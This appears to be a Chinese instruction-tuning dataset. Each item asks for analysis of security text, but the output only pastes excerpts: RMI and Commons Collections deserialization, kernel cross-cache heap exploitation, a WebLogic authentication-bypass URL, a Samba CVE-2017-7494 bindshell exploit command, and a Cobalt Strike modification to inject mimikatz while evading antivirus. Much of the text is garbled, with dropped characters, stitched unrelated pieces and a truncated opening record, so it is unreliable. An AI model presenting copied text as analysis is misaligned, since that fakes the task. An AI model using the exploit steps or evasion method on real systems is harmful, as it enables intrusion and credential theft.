01101100 01100101 00100000 01100111, אשר מתפרש כ-let my people g (ללא o בסוף)</li> <li>כתב מראה: Let my ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n零前 本来打算不卷了好好放松放松但是个事情对我触动较所以就给设了个搞懂 RMI 反序列化相 关攻击的学习标 再加上是为后续深 IIOP/T3 打下基础是最近位师傅问了我关于利 RMI 回显的思路帮师傅搞了半天没 有搞定怪我之前对 RMI 只是浅浅的了解甚都算不上会没能帮上这位师傅的忙很是责所以花点时间学 学 这部分的实现略有复杂本在写的时候也是深感吃RMI 相关的章在上乱七糟由于涉及到安全更新 和绕过之前看了次看的头晕眼花这次趁着有空梳理下 个能有限如有理解错误及偏差请不吝赐教 RMI 介绍 RMI (Remote Method Invocation) 远程法调顾名思义是种调远程位置的对象来执法的思想 这种思想在 C 语中的 RPCRemote Procedure Calls中早就有了体现但是 RPC 是打包和传送数据结构 在 Java 中我们通常传递个完整的对象这个对象既包含数据也包含数据和操作数据的法Java 中如果想 完整的在络中向远程位置传输个对象我们通常使的法是 Java 原反序列化并且可以结合动态类加载 和安全管理器来安全的传输个 Java 类 具体的实现思想就是让我们获取远程主机上对象的引我们调这个引对象但实际法的执在远程位置 上 为了屏蔽络通信的复杂性RMI 引了两个概念分别是 Stubs客户端存根 以及 Skeletons服务端 架当客户端Client试图调个在远端的 Object 时实际调的是客户端本地的个代理类Proxy 这个代理类就称为 Stub在调远端Server的标类之前也会经过个对应的远端代理类就是 Skeleton它从 Stub 中接收远程法调并传递给真实的标类Stubs 以及 Skeletons 的调对于 RMI 服务的 使者来讲是隐藏的我们需主动的去调相关的法但实际的客户端和服务端的络通信时通过 Stub 和 Skeleton 来实现的 这先简单列下整体调时序图后会详细进展开说 使 RMI 先要定义个我们期望能够远程调的接这个接必须扩展 java.rmi.Remote 接来远 程调的对象作为这个接的实例也将实现这个接为这个接成的代理Stub也是如此这个接中的 所有法都必须声明抛出 java.rmi.RemoteException 异常例如 其次我们来创建这个远程接的实现类这个类中是真正的执逻辑代码并且通常会扩展 java.rmi.server.UnicastRemoteObject 类扩展此类后RMI 会动将这个类 export 给远程想要调它的 Client 端同时还提供了些基础的 equals/hashcode/toString 法这必须为这个实现类提供个构造函 数并且抛出 RemoteException 在 export 时会随机绑定个端监听客户端的请求所以即使不注册直接请求这个端也可以通信这部 分也会在后展开说 如果不想让远程对象成为 UnicastRemoteObject 的类后就需要主动的使其静态法 exportObject 来 动 export 对象示例代码如下 public interface RemoteInterface extends Remote { public String sayHello() throws RemoteException; public String sayHello(Object name) throws RemoteException; public String sayGoodbye() throws RemoteException; } public class RemoteObject extends UnicastRemoteObject implements RemoteInterface { protected RemoteObject() throws RemoteException { } @Override public String sayHello() throws RemoteException { return \"Hello My Friend\"; } @Override public String sayHello(Object name) throws RemoteException { return name.getClass().getName(); } @Override public String sayGoodbye() throws RemoteException { return \"Bye\"; } } 现在可以被远程调的对象被创建好了接下来改如何调呢Java RMI 设计了个 Registry 的思想很好理 解我们可以使注册表来查找个远端对象的引更通俗的来讲这个就是个 RMI 电话本我们想在某个 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWho invented the first Prox Card?  a: Charles Walton & Thomas Milheiser  b: Gary Carroll  c: Someone else What security company dismissed it as a mere magicians trick?  a: Wells Fargo  b: Securitas  c: ADT What does this have to do with gold fish?  a: The fish were used like canaries in the mines to detect hazardous substances  b: The fish was used in the logo of a security company  c: The fish were in a fish tank with an underwater reader 6-Aug-09 Slide 1  2009 Michael L. Davis, All Rights Reserved Presentation Teasers Wiegands Wonderful Wires DEFCON 17 July 30, 2009 Michael L. Davis I am here as a private citizen and am not representing my employer. All of the material presented herein has appeared in the public domain at one time or another. I will answer historical questions about John Wiegand and the access control industry. I will NOT answer any questions (technical or otherwise) about my employers or any other vendors products. 6-Aug-09 Slide 3 2009 Michael L. Davis, All Rights Reserved Disclaimer Card Technology Timeline Old Prox Patents John Wiegand - Biography Wiegand Applications Wiegand Inventions Wiegand Hacking Whats Next? 6-Aug-09 Slide 4 2009 Michael L. Davis, All Rights Reserved Agenda Card Technology Time Line 6-Aug-09  2009 Michael L. Davis, All Rights Reserved Slide 5 The First RFID Tag Steven Shepard claims that Mario Cardullo was the inventor of the first RFID Tag*. After a spring of 1969 airplane ride in which he was seated next to an IBM engineer, Cardullo sketched out the idea for the first RFID-like tag with dynamic memory. Patent issued Jan-23- 1973. 6-Aug-09  2009 Michael L. Davis, All Rights Reserved Slide 6 * RFID, Steven Shepard, page 49 6-Aug-09 Slide 7  2009 Michael L. Davis, All Rights Reserved Transponder Apparatus & System Priority Date of May-21-1970 Actually, there were several earlier patents for RFID Interrogator/Transponder ID Systems.  US Patent 3,299,424 - Interrogator-Responder System has a priority date of May-05-1965. Ho", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# keygen-me-2 Reversing, 750 points ## Description: > The software has been updated. Can you find us a new product key for the program? A binary file was attached. ## Solution: Inspecting the executable with Radare2 reveals that the program accepts the key only if a set of 12 constraints is met: ```assembly [0x08048500]> s sym.validate_key [0x08048cb7]> pdf / (fcn) sym.validate_key 325 | sym.validate_key (int arg_8h); | ; var int local_ch @ ebp-0xc | ; arg int arg_8h @ ebp+0x8 | ; CALL XREF from main (0x8048e78) | 0x08048cb7 55 push ebp | 0x08048cb8 89e5 mov ebp, esp | 0x08048cba 83ec18 sub esp, 0x18 | 0x08048cbd 83ec0c sub esp, 0xc | 0x08048cc0 ff7508 push dword [arg_8h] | 0x08048cc3 e8e8f7ffff call sym.imp.strlen ; size_t strlen(const char *s) | 0x08048cc8 83c410 add esp, 0x10 | 0x08048ccb 8945f4 mov dword [local_ch], eax | 0x08048cce 8b45f4 mov eax, dword [local_ch] | 0x08048cd1 83ec08 sub esp, 8 | 0x08048cd4 50 push eax | 0x08048cd5 ff7508 push dword [arg_8h] | 0x08048cd8 e8b9faffff call sym.key_constraint_01 | 0x08048cdd 83c410 add esp, 0x10 | 0x08048ce0 84c0 test al, al | ,=< 0x08048ce2 0f840d010000 je 0x8048df5 | | 0x08048ce8 8b45f4 mov eax, dword [local_ch] | | 0x08048ceb 83ec08 sub esp, 8 | | 0x08048cee 50 push eax | | 0x08048cef ff7508 push dword [arg_8h] | | 0x08048cf2 e8f4faffff call sym.key_constraint_02 | | 0x08048cf7 83c410 add esp, 0x10 | | 0x08048cfa 84c0 test al, al | ,==< 0x08048cfc 0f84f3000000 je 0x8048df5 | || 0x08048d02 8b45f4 mov eax, dword [local_ch] | || 0x08048d05 83ec08 sub esp, 8 | || 0x08048d08 50 push eax | || 0x08048d09 ff7508 push dword [arg_8h] | || 0x08048d0c e832fbffff call sym.key_constraint_03 | || 0x08048d11 83c410 add esp, 0x10 | || 0x08048d14 84c0 test al, al | ,===< 0x08048d16 0f84d9000000 je 0x8048df5 | ||| 0x08048d1c 8b45f4 mov eax, dword [local_ch] | ||| 0x08048d1f 83ec08 sub esp, 8 | ||| 0x08048d22 50 push eax | ||| 0x08048d23 ff7508 push dword [arg_8h] | ||| 0x08048d26 e86ffbffff call sym.key_constraint_04 | ||| 0x08048", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCommonCollection1 InvokeTransformer // // Source code recreated from a .class file by IntelliJ IDEA // (powered by FernFlower decompiler) // package org.apache.commons.collections.functors; import java.io.Serializable; import java.lang.reflect.InvocationTargetException; import java.lang.reflect.Method; import org.apache.commons.collections.FunctorException; import org.apache.commons.collections.Transformer; public class InvokerTransformer implements Transformer, Serializable { static final long serialVersionUID = -8653385846894047688L; private final String iMethodName; private final Class[] iParamTypes; private final Object[] iArgs; public static Transformer getInstance(String methodName) { if (methodName == null) { throw new IllegalArgumentException(\"The method to invoke must not be null\"); } else { return new InvokerTransformer(methodName); } } public static Transformer getInstance(String methodName, Class[] paramTypes, Object[] args) { if (methodName == null) { throw new IllegalArgumentException(\"The method to invoke must not be null\"); } else if (paramTypes == null && args != null || paramTypes != null && args == null || paramTypes != null && args != null && paramTypes.length != args.length) { throw new IllegalArgumentException(\"The parameter types must match the arguments\"); } else if (paramTypes != null && paramTypes.length != 0) { paramTypes = (Class[])paramTypes.clone(); args = (Object[])args.clone(); return new InvokerTransformer(methodName, paramTypes, args); } else { return new InvokerTransformer(methodName); } } private InvokerTransformer(String methodName) { this.iMethodName = methodName; this.iParamTypes = null; 这是一个单例模式设计的类通过transform方法使用反射执行代码传入参数为一个对象 this.iArgs = null; } public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) { this.iMethodName = methodName; this.iParamTypes = paramTypes; this.iArgs = args; } public Object transform(Object input) { if (input == null) { return null; } else { try { Class cls = input.getClass()", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1021-001-win-使用Start_Rdp开启远程桌面服务 ## 来自ATT&CK的描述 攻击者可以利用有效帐户使用远程桌面协议 (RDP) 登录计算机然后攻击者可以作为登录用户执行操作 远程桌面是操作系统中的常见功能它允许用户使用远程系统上的系统桌面图形用户界面登录到交互式会话Microsoft 将其远程桌面协议 (RDP) 的实现称为远程桌面服务 (RDS) 如果启用该服务并允许访问具有已知凭据的帐户攻击者可能会通过RDP/RDS连接到远程系统以扩展访问权限攻击者可能会使用凭据访问技术来获取与RDP一起使用的凭据攻击者还可以利用RDP做持久化操作 ## 测试案例 参考下文中提到的Start_Rdp.exe程序开启RDP服务 <https://github.com/Ryze-T/Windows_API_Tools> 作用开启rdp服务 用法 Start_Rdp.exe ## 检测日志 windows sysmon ## 测试复现 测试环境说明Windows server 2012 ```shell C:\\Windows_API_Tools-main>Start_Rdp.exe success ``` ## 测试留痕 windows sysmon 事件ID1进程创建进程创建事件提供有关新创建进程的扩展信息完整的命令行提供了有关进程执行的上下文ProcessGUID字段是整个域中此过程的唯一值以简化事件关联哈希是文件的完整哈希其中包含HashType字段中的算法 ```log Process Create: RuleName: technique_id=T1059,technique_name=Command-Line Interface UtcTime: 2022-03-24 08:11:46.909 ProcessGuid: {4a363fee-27c2-623c-decd-3f0000000000} ProcessId: 2796 Image: C:\\Windows_API_Tools-main\\Start_Rdp.exe FileVersion: - Description: - Product: - Company: - OriginalFileName: - CommandLine: Start_Rdp.exe CurrentDirectory: C:\\Windows_API_Tools-main\\ User: WEIDONG\\Administrator LogonGuid: {4a363fee-2447-623c-df16-080000000000} LogonId: 0x816DF TerminalSessionId: 1 IntegrityLevel: High Hashes: SHA1=9805144590D86D7BF4D6D01BB368047BC94EF174,MD5=14148598AD98D05A820462F0BBD07B9F,SHA256=98579200636025AA468A3EEC8B217273630FD4658F6ABDBB035C8A094650311A,IMPHASH=60A0824F60935C033352E518E6CDA834 ParentProcessGuid: {4a363fee-246e-623c-4a6d-0f0000000000} ParentProcessId: 3472 ParentImage: C:\\Windows\\System32\\cmd.exe ParentCommandLine: \"C:\\Windows\\System32\\cmd.exe\" ParentUser: WEIDONG\\Administrator ``` 事件ID13值集此注册表事件类型标识注册表值修改该事件记录为DWORD和QWORD类型的注册表值写入的值 ```log Registry value set: RuleName: technique_id=T1112,technique_name=Modify Registry EventType: SetValue UtcTime: 2022-03-24 08:11:46.909 ProcessGuid: {4a363fee-27c2-623c-decd-3f0000000000} ProcessId: 2796 Image: C:\\Windows_API_Tools-main\\Start_Rdp.exe TargetObject: HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections Details: DWORD (0x00000000)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFrom 0 to Secure in 1 Minute DEFCON 23 Nir Valtman & Moshe Ferber About Us Nir Valtman Moshe Ferber ü CISO Retail in NCR Corporation.  We own a private cloud & offering SaaS  Yes we do security! ü Instructor for Cloud Security (CCSK)  thats what I really like doing Passionate about information security Involved in numerous startups and initiatives  sometimes with success, sometimes not Industry speakers and lecturers  thats why we are here I like non- sweating sports! I dont like sport! About the talk Cloud security challenges and benefits And more specifically, using IaaS automation and orchestration features for increasing the security Dashboard Billing API Orchestration Hypervisor Controller Abstraction Physical Servers Network Storage About the talk Cloud Attack Vectors Provider administration Management console Multi tenancy & virtualization Automation & API Chain of supply Side channel attack Insecure instances Anatomy of a cloud hack Anatomy of a cloud hack  the BrowserStack story Shell shock vulnerability on unused server Found API key on hacked server Using API key opened a firewall rule and launch an instance Attached a backup volume to the instance Found database credential on backup device Connected to DB SOURCE: https://www.browserstack.com/attack-and-downtime-on-9-November Do we have the right tools? Source: http://ifail.info/wp-content/uploads/2010/04/street_dentist_thumb.jpg?98bbf9 About the talk Micro-Services Architecture DEV OPS Continuous Delivery 1 hour 10 min 1 min Architecture & Deployments is changing The billing cycle is reducing Google slashes cloud platform price again Microsoft will offer Azure by the minute to take on Amazons cloud Microsoft follows Google with by-the-minute cloud blending AUTO SCALING About the talk How to do security when servers alive for 10 minutes? Patch management Maintenance windows Periodic vulnerability scanning Hardening The image T DONT LET SECURITY HOLD YOU DOWN Source: www.avon-barrier.co.uk About the talk I", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### Cross-Cache Overflow介绍 与我们此前一直关注于 slub allocator 的各种利用手法不同**Cross-Cache Overflow** 实际上是**针对 buddy system** 的利用手法其主要基于如下思路 - slub allocator 底层逻辑是向 buddy system 请求页面后再划分成特定大小 object 返还给上层调用者 - 内存中用作不同 `kmem_cache` 的页面在内存上是有可能相邻的 - 若我们的漏洞对象存在于页面 A溢出目标对象存在于页面 B且 AB两页面相邻则我们便有可能实现跨越不同 `kmem_cache` 之间的堆溢出 **Cross-Cache Overflow 打破了不同 kmem\\_cache 之间的阻碍可以让我们的溢出漏洞对近乎任意的内核结构体进行覆写** 但这需要达成非常严苛的页级堆排布而内核的堆页面布局对我们而言通常是未知的因此我们需要想办法将其变为已知的内存布局这就需要**页级堆风水** ### Page-level Heap Fengshui介绍 顾名思义**页级堆风水**即以内存页为粒度的内存排布方式而内核内存页的排布对我们来说不仅未知且信息量巨大因此这种利用手法实际上是让我们**手工构造一个新的已知的页级粒度内存页排布** 首先让我们重新审视 slub allocator 向 buddy system 请求页面的过程当 freelist page 已经耗空且 partial 链表也为空时或者 `kmem_cache` 刚刚创建后进行第一次分配时其会向 buddy system 申请页面 ![image.png](figure/slub-new-page.png) 接下来让我们重新审视 buddy system 其基本原理就是以 2 的 order 次幂张内存页作为分配粒度相同 order 间空闲页面构成双向链表当低阶 order 的页面不够用时便会从高阶 order 取一份连续内存页拆成两半其中一半挂回当前请求 order 链表另一半返还给上层调用者下图为以 order 2 为例的 buddy system 页面分配基本原理 ![page.gif](figure/buddy.gif) 我们不难想到的是从更高阶 order 拆分成的两份低阶 order 的连续内存页**是物理连续的**由此我们可以 - 向 buddy system 请求两份连续的内存页 - 释放其中一份内存页在 `vulnerable kmem_cache` 上堆喷让其取走这份内存页 - 释放另一份内存页在 `victim kmem_cache` 上堆喷让其取走这份内存页 **此时我们便有可能溢出到其他的内核结构体上从而完成 cross-cache overflow** ### 使用 setsockopt 与 pgv 完成页级内存占位与堆风水方法 那么我们该如何完成这样的页占位与页排布呢笔者这里给出一个来自于 [CVE-2017-7308](https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html) 的方案 当我们创建一个 protocol 为 `PF_PACKET` 的 socket 之后先调用 `setsockopt()` 将 `PACKET_VERSION` 设为 `TPACKET_V1 `/ `TPACKET_V2`再调用 `setsockopt()` 提交一个 `PACKET_TX_RING` 此时便存在如下调用链 ```c __sys_setsockopt() sock->ops->setsockopt() packet_setsockopt() // case PACKET_TX_RING  packet_set_ring() alloc_pg_vec() ``` 在 `alloc_pg_vec()` 中会创建一个 `pgv` 结构体用以分配 `tp_block_nr` 份 2<sup>order</sup> 张内存页其中 `order` 由 `tp_block_size` 决定 ```c static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order) { unsigned int block_nr = req->tp_block_nr; struct pgv *pg_vec; int i; pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN); if (unlikely", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Weblogic 未授权访问漏洞 ## 漏洞描述 Weblogic是Oracle公司推出的J2EE应用服务器CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令使用这两个漏洞组成的利用链可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令 ## 漏洞检测 使用vulhub搭建漏洞演示环境 ```bash cd vulhub/weblogic/CVE-2020-14882 sudo docker-compose up -d ``` ``` http://192.168.0.5:7001/console/css/%252e%252e%252fconsole.portal ``` 攻击者可以构造特殊请求的URL即可未授权访问到管理后台页面 ![image-20220511234328480](../../.gitbook/assets/image-20220511234328480.png) 远程攻击者可以构造特殊的HTTP请求在未经身份验证的情况下接管 WebLogic Server Console 并在 WebLogic Server Console 执行任意代码", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Feistel (crypto, 300p) In the task we get a [plaintext-ciphertext pair](pt-ct.txt) and [encrypted flag](flag.txt). We also get a description of the encryption algorithm - it's a classic Feistel cipher, but the function F applied in the iterations is simply XOR with deterministic round key. This means the round keys for the known PT-CT pair are the same as for the encrypted flag! If we write down what are the possible outcomes from the encryption we can notice a pattern: ``` C1 = PT1  PT2  K1 C2 = C1  P2  K2 = (PT1  PT2  K1)  P2  K2 = PT1  K1  K2 C3 = C1  C2  K3 = (PT1  PT2  K1)  (PT1  K1  K2)  K3 = PT2  K2  K3 C4 = C2  C3  K4 = (PT1  K1  K2)  (PT2  K2  K3)  K4 = PT1  PT2  K1  K3  K4 C5 = C4  C3  K5 = ... = PT1  K1  K2  K4  K5 ``` It loops like this, so that in the resulting ciphertexts we have either `PT1  KX` or `PT2  KX` or `PT1  PT2  KX`, where `KX` is XOR of some round keys. It's easy to notice that we can XOR given `C` with `PT1`, `PT1` or `PT1  PT2` to recover the `KX`, and then XOR this again with flag ciphertexts, in order to decrypt them. W do this with a simple script: ```python from crypto_commons.generic import long_to_bytes, chunk, is_printable def main(): pt = '010000010110111000100000011000010111000001110000011011000110010100100000011000010110111001100100001000000110000101101110001000000110111101110010011000010110111001100111011001010010000001110111011001010110111001110100001000000111010001101111001000000101010001110010011001010110111001100100' ct = '000100100011000101110101001101100110001100110001001110100011110101100000011110010010111000110011001110000000110100100101011111000011000000100001010000100110011100100001011000000111001101110100011011100110000000100000011011010110001001100100001011010110111001100110001010110110110101110001' flag = '000000110000111001011100001000000001100100101100000100100111111000001001000001100000001100001001000100100010011101001010011000010111100100100010010101110100010001000010010101010100010101111111010001000110000001", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTraffic Interception & Remote Mobile Phone Cloning with a Compromised CDMA Femtocell Doug DePerry Tom Ritter Andrew Rahimi iSEC Partners  The specific method used to access the device that makes the demonstration possible has been resolved by Verizon Wireless through a security patch.  The Network Extenders being used to conduct the demonstration do not have the security patch installed.  Verizon Wireless gave iSEC permission to use the network extenders to conduct the demonstration in consideration of iSEC bringing the issue to the attention of Verizon Wireless. 2  This is not like joining an open WiFi network  Your phone associates automatically with no* indication  You might be on ours right now.   We dont hack phones at least not today No User Interaction 3 Full Disclosure  Disclosed vulnerabilities to the carrier early December  They worked extremely hard, over Christmas, to prepare a patch  All vulnerabilities disclosed in this presentation have been patched  We do have architectural concerns around femtocells  Concerns shared by 4 Prior Art  BH 2011 Femtocells: a Poisonous Needle in the Operator's Hay Stack  SFR Femtocell (2nd biggest operator in France)  THC: Vodafone (2010/2011)  RSAXVC & Doug Kelly (Bsides KC 2011)  Rooting  Cable construction  Do It Yourself Cellular IDS  Black Hat 2013 5  North American Carrier  3G  CDMA  Customers affected  Roughly 1/3 of the population of the US  Phone Calls & SMS  MMS, Data Man-In-The-Middling, SSL Stripping  Cloning Our Focus 6 Rooting Exploring  Filesystem  Traffic Exploiting  Voice, SMS, Data Cloning Fixing Agenda 7 General Architecture We Are Here!  8 Rooting the Femtocell(s) SCS-26UC4 (Older) SCS-2U01 (Newer) 9 Rooting the Femtocell(s) SCS-26UC4 (Older) SCS-2U01 (Newer) Bonus! 10  Faraday FA626TE ARM v5TE processor  on Samsung UCMB board  OneNAND flash memory  Lattice FPGA  Presumably for DSP  GPS antenna  CDMA antenna  2G/3G  Ethernet  HDMI Port SCS-2U01 Hardware 11  HDMI port Console Port 12  USB FTDI + HDMI = ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n众所周知Cobalt Strike的一些功能模块都是用spawn的方法实现其原理就是启动一个进程然后对该 进程进行功能模块dll反射注入默认profile下是启动rundll32.exe这个进程这种行为在数字的核晶模式 下是会被拦截的前两天刚好在吐司看到一篇文章有讲到修改Cobalt Strike的源码将spawn的方式修改 为inject的方法是可以bypass数字核晶的因为将Cobalt Strike内置的功能模块dll注入到当前进程就没有 新启进程的行为本文结合上述文章并在@wonderkun师傅的帮助下得到了一个更好的修改方案 功能模块分析 Cobalt Strike常见的功能如logonpasswordshashdump等功能在jar代码实现是 beacon.TaskBeacon.class 以logonpasswords为例最终定位到如下代码处 在MimikatzSmall方法中根据目标系统版本进行spawn跟进到MimikatzJobSmall方法最后rdi的是 mimikatz-min.x64.dll或者mimikatz-min.x86.dll这个dll public void LogonPasswords() { MimikatzSmall(\"sekurlsa::logonpasswords\"); } public void MimikatzSmall(String paramString) { for (int i = 0; i < this.bids.length; i++) { BeaconEntry localBeaconEntry = DataUtils.getBeacon(this.data, this.bids[i]); if (localBeaconEntry.is64()) { new MimikatzJobSmall(this, paramString).spawn(this.bids[i], \"x64\"); } else { new MimikatzJobSmall(this, paramString).spawn(this.bids[i], \"x86\"); } } } public class MimikatzJobSmall extends MimikatzJob { public MimikatzJobSmall(TaskBeacon paramTaskBeacon, String paramString) { super(paramTaskBeacon, paramString); } public String getDLLName() { if (this.arch.equals(\"x64\")) { return \"resources/mimikatz-min.x64.dll\"; } return \"resources/mimikatz-min.x86.dll\"; } } 修改Java 只需要将spawn方法修改inject方法即可jar里实现的inject方法的需要传入pid因为我们是注入当前进 程所以需要通过jar里实现的方法去获取当前进程的pid另外需要注意的就是下面代码中的 localBeaconEntry.arch()获取是当前进程的位数而原来代码里的localBeaconEntry.is64()获取系统的位 数因为我们用到的是inject所以需要在x64的进程中注入x64的dllx86的dll中注入x86的dll DLL加解密 因为Cobalt Strike中的DLL是加密的需要进行解密才能对其dll进行修改相关操作这里就不再详细说 了 具体可以参考 https://github.com/lovechoudoufu/cobaltstrike4.4_cdf#dll%E4%BF%AE%E6%94%B9 修改相应的DLL 以logonpasswords为例最后rdi的是mimikatz-min.x64.dll或者mimikatz-min.x86.dll这个dllida看一下 这个dll可以看到DLL的核心功能是在dllmain中完成的调用功能函数之后会直接调用ExitProcess 退 出了进程 public void MimikatzSmall(String paramString) { for (int i = 0; i < this.bids.length; i++) { BeaconEntry localBeaconEntry = DataUtils.getBeacon(this.data, this.bids[i]); int PID = CommonUtils.toNumber(localBeaconEntry.getPid(), 0); if (\"x64\"", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Samba 远程命令执行漏洞CVE-2017-7494 运行测试环境 ``` docker compose up -d ``` Samba版本4.6.3该漏洞在4.6.4被修复 ## 原理 Samba允许连接一个远程的命名管道并且在连接前会调用`is_known_pipename()`函数验证管道名称是否合法在`is_known_pipename()`函数中并没有检查管道名称中的特殊字符加载了使用该名称的动态链接库导致攻击者可以构造一个恶意的动态链接库文件执行任意代码 该漏洞要求的利用条件 - 拥有共享文件写入权限如匿名可写等 - 需要知道共享目录的物理路径 参考 - https://medium.com/@lucideus/sambacry-rce-exploit-lucideus-research-3a3e5bd9e17c - https://github.com/opsxcq/exploit-CVE-2017-7494 - http://bobao.360.cn/learning/detail/3900.html ## 测试过程 测试环境运行后监听445端口默认开启了一个共享myshare共享的目录为`/home/share`可读可写 我们可以在Linux下用smbclient安装`apt install smbclient`连接试试 ![](02.png) 成功连接大家测试的时候如果连接不成功有可能是国内运营商封了445端口最好在本地或虚拟机测试比如上图 参考[#224](https://github.com/vulhub/vulhub/issues/224)新版metasploit可能无法复现这个漏洞我们使用<https://github.com/opsxcq/exploit-CVE-2017-7494>来复现 在目标服务器上执行`/home/share/libbindshell-samba.so`其中myshare是分享名称在vulhub中为`myshare`而`/home/share`是对应的可写目录`-u`和`-p`用来指定用户名密码当前环境是一个匿名smb所以填写任意信息均可因为libbindshell-samba.so是一个bindshell监听地址是6699所以我们通过`-P`指定这个端口在实际渗透中我们可以修改`libbindshell-samba.c`写入任意其他代码如反弹shell避免使用bindshell ``` ./exploit.py -t your-ip -e libbindshell-samba.so -s myshare -r /home/share/libbindshell-samba.so -u guest -p guest -P 6699 ``` 成功执行命令 ![](01.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"CREATE OPERATOR CLASS\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME CREATE OPERATOR CLASS \\- 定义一个新的操作符类 .SH SYNOPSIS .sp .nf CREATE OPERATOR CLASS \\fIname\\fR [ DEFAULT ] FOR TYPE \\fIdata_type\\fR USING \\fIindex_method\\fR AS { OPERATOR \\fIstrategy_number\\fR \\fIoperator_name\\fR [ ( \\fIop_type\\fR, \\fIop_type\\fR ) ] [ RECHECK ] | FUNCTION \\fIsupport_number\\fR \\fIfuncname\\fR ( \\fIargument_type\\fR [, ...] ) | STORAGE \\fIstorage_type\\fR } [, ... ] .sp .fi .SH \"DESCRIPTION 描述\" .PP \\fBCREATE OPERATOR CLASS\\fR 定义一个新的操作符表 一个操作符表定义一种特定的数据类型可以如何与一种索引一起使用 操作符表声明特定的操作符可以为这种数据类型以及这种索引方法填充特定角色或者\"策略\" 操作符表还声明索引方法在为一个索引字段选定该操作符表的时候要使用的支持过程 所有操作符表使用的函数和操作符都必须在创建操作符表之前定义 .PP 如果给出了模式名字那么操作符表就在指定的模式中创建 否则就在当前模式中创建在搜索路径前面的那个参阅 CURRENT_SCHEMA() 在同一个模式中的两个操作符表可以有同样的名字但它们必须用于不同的索引方法 .PP 定义操作符表的用户成为其所有者目前创造者必须是超级用户 作这样的限制是因为一个有问题的操作符表定义会让服务器困惑甚至崩溃 .PP \\fBCREATE OPERATOR CLASS\\fR 目前并不检查这个类定义是否包含所有索引方法需要操作符以及函数 定义一个合法的操作符表是用户的责任 .PP 参考 ``Interfacing Extensions to Indexes'' 获取更多信息 .SH \"PARAMETERS 参数\" .TP \\fB\\fIname\\fB\\fR 将要创建的操作符表的名字名字可以用模式修饰 .TP \\fBDEFAULT\\fR 如果出现了这个键字那么该操作符表将成为它的数据类型的缺省操作符表 对于某个数据类型和访问方式而言最多可以有一个操作符表是缺省的 .TP \\fB\\fIdata_type\\fB\\fR 这个操作符表处理的字段数据类型 .TP \\fB\\fIindex_method\\fB\\fR 这个操作符表处理的索引访问方式的名字 .TP \\fB\\fIstrategy_number\\fB\\fR 一个操作符和这个操作符表关联的索引访问方式的策略数 .TP \\fB\\fIoperator_name\\fB\\fR 一个和该操作符表关联的操作符的名字可以用模式修饰 .TP \\fB\\fIop_type\\fB\\fR 一个操作符的输入数据类型或者是 NONE 表示左目或者右目操作符 通常情况下可以省略输入数据类型因为这个时候它们和操作符表的数据类型相同 .TP \\fBRECHECK\\fR 如果出现那么索引对这个操作符是\"lossy\"有损耗的 因此使用这个索引检索的行必须重新检查以保证它们真正满足和此操作符相关的条件子句 .TP \\fB\\fIsupport_number\\fB\\fR 索引方法对一个与操作符表关联的函数的支持过程数 .TP \\fB\\fIfuncname\\fB\\fR 一个函数的名字可以有模式修饰这个函数是索引访问方式对此操作符表的支持过程 .TP \\fB\\fIargument_types\\fB\\fR 函数的参数数据类型 .TP \\fB\\fIstorage_type\\fB\\fR 实际存储在索引里的数据类型通常它和字段数据类型相同 但是一些索引方法到目前为止只有 GIST允许它是不同的 除非索引方法允许使用一种不同的类型否则必须省略 STORAGE 子句 .PP OPERATORFUNCTION和 STORAGE 子句可以按照任意顺序出现 .PP .SH \"EXAMPLES 例子\" .PP 下面的例子命令为数据类型 _int4int4 的数组定义了一个 GiST 索引操作符表 参阅 contrib/intarray/ 获取完整的例子 .sp .nf ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nReverse Engineering by Crayon: Reverse Engineering by Crayon: Game Changing Hypervisor and Game Changing Hypervisor and Game Changing Hypervisor and Game Changing Hypervisor and Visualization Analysis Visualization Analysis Fine-grained covert debugging using hypervisors and analysis via visualization Daniel A. Quist Lorie M. Liebrock Offensive Computing, LLC New Mexico Tech Defcon 17 Las Vegas, NV Introduction Introduction Introduction Introduction Reverse Engineering is Hard! g g Hypervisor based executable monitoring monitoring Modifications for improved performance Visualization tool for rapid analysis Visualization tool for rapid analysis Modifying the reverse engineering process Difficulties of RE Difficulties of RE Difficulties of RE Difficulties of RE Time consuming process g p Difficult set of skills to acquire Tools are advanced but still 